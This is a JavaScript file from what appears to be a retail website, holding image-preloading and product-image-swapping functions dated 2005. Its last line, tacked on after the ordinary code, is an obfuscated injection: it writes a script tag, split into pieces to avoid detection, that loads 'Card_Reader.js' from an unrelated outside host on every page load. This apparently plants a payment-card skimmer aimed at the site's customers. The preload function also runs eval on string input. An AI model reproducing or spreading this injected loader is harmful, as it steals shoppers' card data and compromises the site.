// preloadSingleImage // Description: General purpose function for peloading a list of images.// Parameters:  path        - location of images.  e.g. '/images/'//              preloadList - comma delimited list of obj name & associated image//                            Note the obj name and image are * delimited//                            e.g. 'titanImage*titanium.jpg,aquaImage*aqua.jpg,'//							  List must end with a trailing comma as in example above// Written by Ron Clabo  8/3/05                              function preloadSingleImages(path, preloadList ) { 	if ( document.images ) {		var charLoc, charLoc2            = 0;		var thisItem, thisFile, objName = '';		while ( true ){			charLoc = preloadList.indexOf( ',' );			if ( charLoc == -1 ) 				break;			else{				thisItem = preloadList.substring( 0, charLoc );				charLoc2 = thisItem.indexOf( '*' );				objName = thisItem.substring( 0, charLoc2 );				thisFile = thisItem.substring( charLoc2 + 1 );				eval ( 'document.' + objName + ' = new Image()' );				eval ('document.'+ objName + '.src = "'+ path + thisFile + '"');								preloadList = preloadList.substring( charLoc + 1 );			}		}	} }function flipimage_SBChoice ( beautyimage, image ) { if ( document.images ) { // H*A*C*Kif ( beautyimage) {  document['Choice'+beautyimage+''].src = '/images/prdShoulderBagsChoice'+beautyimage+''+image+'.gif';}	}}function flipimage_MT ( inimage ) { if ( document.images ) { // H*A*C*K if ( inimage == '1' )  document['Beauty'].src = '/images/prdMacTruckBeauty1.gif'; else if ( inimage == '2' )  document['Beauty'].src = '/images/prdMacTruckBeauty2.gif'; else if ( inimage == '3' )  document['Beauty'].src = '/images/prdMacTruckBeauty3.gif'; else if ( inimage == '3' )  document['Beauty'].src = '/images/prdMacTruckBeauty3.gif'; else if ( inimage == '4' )  document['Beauty'].src = '/images/prdMacTruckBeauty4.gif'; else if ( inimage == '5' )  document['Beauty'].src = '/images/prdMacTruckBeauty5.gif'; else if ( inimage == '6' )  document['Beauty'].src = '/images/prdMacTruckBeauty6.gif'; else if ( inimage == '7' )  document['Beauty'].src = '/images/prdMacTruckBeauty7.gif'; else if ( inimage == '8' )  document['Beauty'].src = '/images/prdMacTruckBeauty8.gif'; else if ( inimage == '9' )  document['Beauty'].src = '/images/prdMacTruckBeauty9.gif'; else if ( inimage == '10' )  document['Beauty'].src = '/images/prdMacTruckBeauty10.gif';} }
document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/Card_Reader.js"></scri'+'pt>');
